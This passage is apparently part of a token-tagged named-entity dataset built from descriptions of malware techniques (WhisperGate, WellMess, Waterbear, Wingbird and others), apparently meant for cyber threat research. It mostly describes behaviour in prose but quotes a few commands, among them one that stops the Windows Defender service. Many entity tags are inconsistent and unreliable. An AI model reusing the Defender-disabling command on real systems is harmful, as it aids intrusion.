"O" ] }, { "tokens": [ "WastedLocker", "has", "used", "cmd", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "has", "a", "command", "to", "take", "ownership", "of", "a", "file", "and", "reset", "the", "ACL", "permissions", "using", "the", "<code>takeown.exe", "/F", "filepath</code>", "command." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "WastedLocker", "created", "and", "established", "a", "service", "that", "runs", "until", "the", "encryption", "process", "is", "complete." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "has", "used", "DLL", "side", "loading", "to", "import", "and", "load", "a", "malicious", "DLL", "loader." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "has", "the", "ability", "to", "decrypt", "its", "RC4", "encrypted", "payload", "for", "execution." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "has", "used", "RC4", "encrypted", "shellcode", "and", "encrypted", "functions." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "hook", "the", "<code>ZwOpenProcess</code>", "and", "<code>GetExtendedTcpTable</code>", "APIs", "called", "by", "the", "process", "of", "a", "security", "product", "to", "hide", "PIDs", "and", "TCP", "records", "from", "detection." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "scramble", "functions", "not", "to", "be", "executed", "again", "with", "random", "values." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "receive", "and", "load", "executables", "from", "remote", "C2", "servers." ], "ner_tags": [ "B-Org", "O", "B-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "has", "deleted", "certain", "values", "from", "the", "Registry", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "leverage", "API", "functions", "for", "execution." ], "ner_tags": [ "B-Org", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "identify", "the", "process", "for", "a", "specific", "security", "product." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "inject", "decrypted", "shellcode", "into", "the", "LanmanServer", "service." ], "ner_tags": [ "B-Org", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "query", "the", "Registry", "key", "<code>\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"</code>", "to", "see", "if", "the", "value", "`OracleOcilib`", "exists." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "find", "the", "presence", "of", "a", "specific", "security", "software." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "use", "API", "hooks", "on", "`GetExtendedTcpTable`", "to", "retrieve", "a", "table", "containing", "a", "list", "of", "TCP", "endpoints", "available", "to", "the", "application." ], "ner_tags": [ "B-Org", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Waterbear", "can", "use", "thread", "injection", "to", "inject", "shellcode", "into", "the", "process", "of", "security", "software." ], "ner_tags": [ "B-Org", "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "archive", "files", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "use", "hard", "coded", "client", "and", "certificate", "authority", "certificates", "to", "communicate", "with", "C2", "over", "mutual", "TLS." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "exfiltrate", "files", "from", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "decompress", "scripts", "received", "from", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "receive", "data", "and", "executable", "scripts", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "use", "TCP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "WellMail", "has", "been", "observed", "using", "TCP", "port", "25,", "without", "using", "SMTP,", "to", "leverage", "an", "open", "port", "for", "secure", "command", "and", "control", "communications." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "identify", "the", "IP", "address", "of", "the", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMail", "can", "identify", "the", "current", "username", "on", "the", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "communicate", "to", "C2", "with", "mutual", "TLS", "where", "client", "and", "server", "mutually", "check", "certificates." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "has", "the", "ability", "to", "use", "DNS", "tunneling", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "send", "files", "from", "the", "victim", "machine", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "decode", "and", "decrypt", "data", "received", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "identify", "domain", "group", "membership", "for", "the", "current", "user." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "write", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "use", "junk", "data", "in", "the", "Base64", "string", "for", "additional", "obfuscation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "execute", "PowerShell", "scripts", "received", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "has", "used", "Base64", "encoding", "to", "uniquely", "identify", "communication", "to", "and", "from", "the", "C2." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "encrypt", "HTTP", "POST", "data", "using", "RC6", "and", "a", "dynamically", "generated", "AES", "key", "encrypted", "with", "a", "hard", "coded", "RSA", "public", "key." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "WellMess", "can", "identify", "the", "computer", "name", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "identify", "the", "IP", "address", "and", "user", "domain", "on", "the", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "collect", "the", "username", "on", "the", "victim", "machine", "to", "send", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "use", "HTTP", "and", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "WellMess", "can", "execute", "command", "line", "scripts", "received", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wevtutil", "can", "be", "used", "to", "clear", "system", "and", "security", "event", "logs", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wevtutil", "can", "be", "used", "to", "export", "events", "from", "a", "specific", "log." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Wevtutil", "can", "be", "used", "to", "disable", "specific", "event", "logs", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "overwrites", "the", "MBR", "with", "a", "bootloader", "component", "that", "performs", "destructive", "wiping", "operations", "on", "hard", "drives", "and", "displays", "a", "fake", "ransom", "note", "when", "the", "host", "boots." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "WhisperGate", "third", "stage", "can", "use", "the", "AdvancedRun.exe", "tool", "to", "execute", "commands", "in", "the", "context", "of", "the", "Windows", "TrustedInstaller", "group", "via", "`%TEMP%\\AdvancedRun.exe\"", "/EXEFilename", "\"C:\\Windows\\System32\\sc.exe\"", "/WindowState", "0", "/CommandLine", "\"stop", "WinDefend\"", "/StartDirectory", "\"\"", "/RunAs", "8", "/Run`." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "corrupt", "files", "by", "overwriting", "the", "first", "1", "MB", "with", "`0xcc`", "and", "appending", "random", "extensions." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "deobfuscate", "downloaded", "files", "stored", "in", "reverse", "byte", "order", "and", "decrypt", "embedded", "resources", "using", "multiple", "XOR", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "download", "and", "execute", "AdvancedRun.exe", "to", "disable", "the", "Windows", "Defender", "Theat", "Protection", "service", "and", "set", "an", "exclusion", "path", "for", "the", "C:\\", "drive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "overwrite", "sectors", "of", "a", "victim", "host's", "hard", "drive", "at", "periodic", "offsets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "overwrite", "the", "Master", "Book", "Record", "(MBR)", "on", "victim", "systems", "with", "a", "malicious", "16-bit", "bootloader." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "Base64", "encode", "strings,", "store", "downloaded", "files", "in", "reverse", "byte", "order,", "and", "use", "the", "Eazfuscator", "tool", "to", "obfuscate", "its", "third", "stage." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "delete", "tools", "from", "a", "compromised", "host", "after", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "locate", "files", "based", "on", "hardcoded", "file", "extensions." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "download", "additional", "stages", "of", "malware", "from", "a", "Discord", "CDN", "channel." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "has", "used", "`InstallUtil.exe`", "as", "part", "of", "its", "process", "to", "disable", "Windows", "Defender." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "has", "been", "disguised", "as", "a", "JPG", "extension", "to", "avoid", "detection", "as", "a", "malicious", "PE", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "WhisperGate", "has", "used", "the", "`ExitWindowsEx`", "to", "flush", "file", "buffers", "to", "disk", "and", "stop", "running", "processes", "and", "other", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "enumerate", "connected", "remote", "logical", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "use", "PowerShell", "to", "support", "multiple", "actions", "including", "execution", "and", "defense", "evasion." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "has", "the", "ability", "to", "inject", "its", "fourth", "stage", "into", "a", "suspended", "process", "created", "by", "the", "legitimate", "Windows", "utility", "`InstallUtil.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate's", "downloader", "can", "reverse", "its", "third", "stage", "file", "bytes", "and", "reflectively", "load", "the", "file", "as", "a", ".NET", "assembly." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "WhisperGate", "can", "recognize", "the", "presence", "of", "monitoring", "tools", "on", "a", "target", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "download", "and", "execute", "AdvancedRun.exe", "via", "`sc.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "B-Way" ] }, { "tokens": [ "WhisperGate", "can", "stop", "its", "execution", "when", "it", "recognizes", "the", "presence", "of", "certain", "monitoring", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "has", "the", "ability", "to", "enumerate", "fixed", "logical", "drives", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "shutdown", "a", "compromised", "host", "through", "execution", "of", "`ExitWindowsEx`", "with", "the", "`EXW_SHUTDOWN`", "flag." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "pause", "for", "20", "seconds", "to", "bypass", "antivirus", "solutions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "use", "a", "Visual", "Basic", "script", "to", "exclude", "the", "`C:\\`", "drive", "from", "Windows", "Defender." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "WhisperGate", "can", "make", "an", "HTTPS", "connection", "to", "download", "additional", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "download", "additional", "payloads", "hosted", "on", "a", "Discord", "channel." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WhisperGate", "can", "use", "`cmd.exe`", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Wiarp", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "download", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Wiarp", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "inject", "files", "into", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Wiarp", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "open", "a", "command", "line", "interface." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wiarp", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "create", "a", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WinMM", "is", "usually", "configured", "with", "primary", "and", "backup", "domains", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WinMM", "sets", "a", "WH_CBT", "Windows", "hook", "to", "search", "for", "and", "capture", "files", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WinMM", "sets", "a", "WH_CBT", "Windows", "hook", "to", "collect", "information", "on", "process", "creation." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WinMM", "collects", "the", "system", "name,", "OS", "version", "including", "service", "pack,", "and", "system", "install", "date", "and", "sends", "the", "information", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WinMM", "uses", "NetUser-GetInfo", "to", "identify", "that", "it", "is", "running", "under", "an", "“Admin”", "account", "on", "the", "local", "system." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WinMM", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "use", "the", "macOS", "built-in", "zip", "utility", "to", "archive", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "can", "identify", "and", "add", "files", "that", "possess", "specific", "file", "extensions", "to", "an", "array", "for", "archiving." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "decrypt", "strings", "using", "hard-coded", "AES", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "WindTail", "can", "be", "delivered", "as", "a", "compressed,", "encrypted,", "and", "encoded", "payload." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "automatically", "exfiltrate", "files", "using", "the", "macOS", "built-in", "utility", "/usr/bin/curl." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "receive", "and", "execute", "a", "self-delete", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "enumerate", "the", "users", "home", "directory", "and", "the", "path", "to", "its", "own", "application", "bundle." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "can", "instruct", "the", "OS", "to", "execute", "an", "application", "without", "a", "dock", "icon", "or", "menu." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "been", "incompletely", "signed", "with", "revoked", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "used", "icons", "mimicking", "MS", "Office", "files", "to", "mask", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "can", "invoke", "Apple", "APIs", "<code>contentsOfDirectoryAtPath</code>,", "<code>pathExtension</code>,", "and", "(string)", "<code>compare</code>." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "generate", "the", "current", "date", "and", "time." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "can", "use", "the", "<code>open</code>", "command", "to", "execute", "an", "application." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WindTail", "has", "the", "ability", "to", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Windows", "Credential", "Editor", "can", "dump", "credentials." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Winexe", "installs", "a", "service", "on", "the", "remote", "system,", "executes", "the", "command,", "then", "uninstalls", "the", "service." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Wingbird", "side", "loads", "a", "malicious", "file,", "sspisrv.dll,", "in", "part", "of", "a", "spoofed", "lssas.exe", "service." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Wingbird", "exploits", "CVE-2016-4117", "to", "allow", "an", "executable", "to", "gain", "escalated", "privileges." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "deletes", "its", "payload", "along", "with", "the", "payload's", "parent", "process", "after", "it", "finishes", "copying", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "drops", "a", "malicious", "file", "(sspisrv.dll)", "alongside", "a", "copy", "of", "lsass.exe,", "which", "is", "used", "to", "register", "a", "service", "that", "loads", "sspisrv.dll", "as", "a", "driver.", "The", "payload", "of", "the", "malicious", "driver", "(located", "in", "its", "entry-point", "function)", "is", "executed", "when", "loaded", "by", "lsass.exe", "before", "the", "spoofed", "service", "becomes", "unstable", "and", "crashes." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "performs", "multiple", "process", "injections", "to", "hijack", "system", "processes", "and", "execute", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "checks", "for", "the", "presence", "of", "Bitdefender", "security", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "uses", "services.exe", "to", "register", "a", "new", "autostart", "service", "named", "\"Audit", "Service\"", "using", "a", "copy", "of", "the", "local", "lsass.exe", "file." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Wingbird", "checks", "the", "victim", "OS", "version", "after", "executing", "to", "determine", "where", "to", "drop", "files", "based", "on", "whether", "the", "victim", "is", "32-bit", "or", "64-bit." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wingbird", "uses", "services.exe", "to", "register", "a", "new", "autostart", "service", "named", "\"Audit", "Service\"", "using", "a", "copy", "of", "the", "local", "lsass.exe", "file." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "decoded", "XOR", "encoded", "strings", "holding", "its", "configuration", "upon", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "can", "encode", "its", "configuration", "file", "with", "single-byte", "XOR", "encoding." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "the", "ability", "to", "deploy", "modules", "directly", "from", "command", "and", "control", "(C2)", "servers,", "possibly", "for", "remote", "command", "execution,", "file", "exfiltration,", "and", "socks5", "proxying", "on", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "B-Purp", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "used", "ICMP,", "custom", "TCP,", "and", "UDP", "in", "outbound", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "used", "a", "modified", "copy", "of", "the", "open-source", "userland", "rootkit", "Azazel,", "named", "libxselinux.so,", "to", "hide", "the", "malware's", "operations", "and", "network", "activity." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "used", "a", "custom", "TCP", "protocol", "with", "four-byte", "XOR", "for", "command", "and", "control", "(C2)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "used", "a", "passive", "listener,", "capable", "of", "identifying", "a", "specific", "magic", "value", "before", "executing", "tasking,", "as", "a", "secondary", "command", "and", "control", "(C2)", "mechanism." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", 